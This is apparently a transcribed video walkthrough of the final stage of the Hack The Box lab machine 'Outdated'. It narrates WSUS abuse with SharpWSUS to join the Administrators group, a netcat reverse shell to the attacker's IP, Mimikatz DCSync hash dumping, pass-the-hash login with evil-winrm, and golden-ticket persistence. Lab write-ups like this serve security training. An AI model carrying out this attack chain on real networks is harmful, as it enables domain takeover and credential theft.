Welcome back, guys. So this is the final part of outdated Hackthebox machine, where we are going to escalate our privileges by exploiting a vulnerability of Windows Update Server, and we are going to be the root user of the domain controller. So in the previous video, we already put the sharp_versus.exe file on the target machine here, and as we can see, this sflower user is the domain user member on the domain controller, and in the local group membership, he is the member of remote management user and versus administrator. So we already tested that this versus server is vulnerable. Okay, and now we are going to execute this sharp versus. But before that, I just want to show you the resource from where you can get the commands of this sharp versus to exploit. So payload all the things, sharp versus. Okay, Active Directory, this one. So once you go to this resource and make it Control F, and here we can write sharp versus, and this is the section for the versus deployment, right? So here, as you can see, this is the command what we need to execute, but we will execute it from the command prompt, and we will change this command a bit. So I'm going to copy this command, come here and paste that here. Fine. Now let's go, and I'm going to upload the binary, which is netcat binary. So upload /root/desktop. Inside desktop there is outdated msdt -folina. I put the sharp versus here, sharp versus.exe. no, not this one, I already put that. We need to upload nc64.exe, and we will put that file here on this path. So paste that, nc.exe. Fine. Okay, so the file is successfully uploaded. Directory, it's there. So first of all, I'm going to take a netcat reverse shell. So come here, nc -nlvp on port number 9001. Okay, and come back here. Here I'm going to say nc.exe -e cmd.exe on my machine, which is 10.10.16.7 on port number 9001. Fine. So now if we come here, we should have a shell here. Yeah, we have a shell. So directory, and all the files are here. Okay, now we need to first of all create the payload. So this one is going to be sharp versus.exe, and then we are going to create the payload. So payload, and here instead of C users sflowers, desktop, and inside desktop we have PrivEsc file, PrivEsc64.exe. okay, and once we execute this, we need to accept the agreement. So for this I need to specify the arguments. So for arguments, let's say this is going to be the argument. So copy that and paste it here. Okay, now we need to execute the command. So cmd.exe /c means we are executing the command with cmd, and the command is going to be something like this. Net space local group, and the group name is administrators. Okay, and we are going to add this sflower user to the administrator group, right? sflowers, and then add. Fine. And the last thing is going to be title. So the title could be anything. Let's say Hellboy. Fine. So everything seems okay. Now let's go and execute this command. Once we execute this command, the rest of the commands it is going to show us. So what we basically doing here, we are creating an update, and in that update we are executing a payload which is here, and in the payload we are going to add this sflower user in the local administrators group. So copy that and paste it here, hit enter. Okay, so it creates the update. Now we need to approve the update, so I'm going to copy this, come here, paste that here. Here I just need to WSUS S#, and this is the update ID, and in the computer name we just need to put dc.outdated.htb and let's see, the group name is going to be demo group, like this. Okay, so copy that and come back here, just paste that and hit enter. Okay, so approved, and as you can see the group is created. First it checks whether the group exists or not. If false, then it is going to create that group. Now the last thing is we need to check whether the update is installed or not. So let's take this, come back here, paste that, and again same, I'm going to copy this and paste it here. Rest of the things are okay. Here we just need to put this, paste. Now copy that, come here and paste that, hit enter. So update is not installed. So at that point you need to wait a moment so that the update is installed on this system, and once the update is installed, the user sflower will be the member of administrators group. Okay, let's paste that again. Still didn't install. Net user sflowers. So up to now he is not a member of administrators group. Paste that again. Not installed. Paste again. Hit enter. Not installed. Try again. Let's see. Not installed. we try again, net user as flowers, still not. Update is not installed, so just wait few moments. And I think the update is installed, and as you can see, now we are the member of administrators group. So if I try to check whether the update is installed or not, so as you can see here, update is installed and we are the member of administrators group. So if we go up, so here as you can see, before we are member of only remote management user group and versus administrators group, but now we are member of administrators group too. So if we are member of administrators group, we can access anything. So let's say cd/users, and let's see the directories. There is administrators, so let's go cd administrators. Denied. Why? Host name DC. Okay. Oh, come on. CD administrator. Net user s flowers. Yes, we are member of administrators group. Okay, let's see administrator/desktop. Why so? Okay, I'm going to exit from here and go back to Evil Villarem. Net user s flowers. Yeah, here also you can say we are administrators in administrators group. Before we are not in the administrators group. Okay, dir/users administrator is there, cd dot dot slash dot dot slash administrator slash desktop. Come on. Let's just cancel that, because maybe we need to log out the session and log in again. So clear and log in again. Let's try dir -dc/c. So we can access the domain controller C drive. We can do one more thing. We are in administrators group, so let's try here downloading Mimikatz. If we have it here, opt, we have Mimikatz. Yeah, we have mimikatz.exe. So I'm going to copy this, or no need for copying. I'm just going to cd // desktop and upload /opt /mimikatz.exe to this path. mimikatz.exe. And let's try here, clear this and listen on port 9001. Who am I /priv. Let's see now what privileges we have. And as you can see, we have all these privileges enabled. So let's see if we have impersonation. See, impersonation is enabled. Okay, fine. So the first thing is I'm going to execute netcat cmd.exe 10.10.16.7 on port number 9001 and come back here. We have a shell. Now mimikatz.exe privilege : debug. Okay, 20. Okay, fine. Now let's elevate the token elevate, and now we have the token. SID name is anti-authority system, and as you can see, impersonated from process token is this, thread token is this now. So what we can do, we can dump the hashes, LSA dump : let's say DC sync, and I think domain, we need to specify the domain, outdated.htb/all, and here we have all the tokens. Okay, go up, username Sam administrator, and this is the NTLM hash for administrator. Let's see, come back here and vertical, what I just did. Oh god, I think I closed the session. Okay, no problem. We have here the NTLM hashes. Let's try to open new vertical terminal, and here I'm going to say evil -winrm space -i 10.10.11.175 space -u administrator and space -h. Where is it? Administrator. This is the Okay, copy that hash and paste it here. Let's see. And we logged in. So who am I? We are administrator. Well done. Cd / desktop, and now we don't have any restrictions. Dir, and boom, we have the root flag. So type root.text. Okay, so this is the root flag. Now beyond root or beyond administrator, let's see if we find curved TGT hashes or not. So if we have curved TGT hashes, then we can go and make the golden ticket. So once we have the golden ticket, we are going to we can access any resource of the domain. Curved TGT, this one. So this is the Kerberos TGT, ticket granting ticket, and with this NTLM hash we can create the golden ticket, and after golden ticket we can take the session that contains the golden ticket and we can access any resource in the domain. So this is actually golden ticket used for persistence, and we already have administrator, so I leave it on you to go and explore more about golden ticket, read about golden ticket, and once you root this machine, go to create the golden ticket. Okay, so I think that's it for this video, and this machine is actually a bit problematic because a lot of time you have to reset and a lot of time you have to wait for things to be happened. So I love this machine truly, and that's it. So if you like the content, please like, subscribe and share, and see you in the next video. Thank you and bye.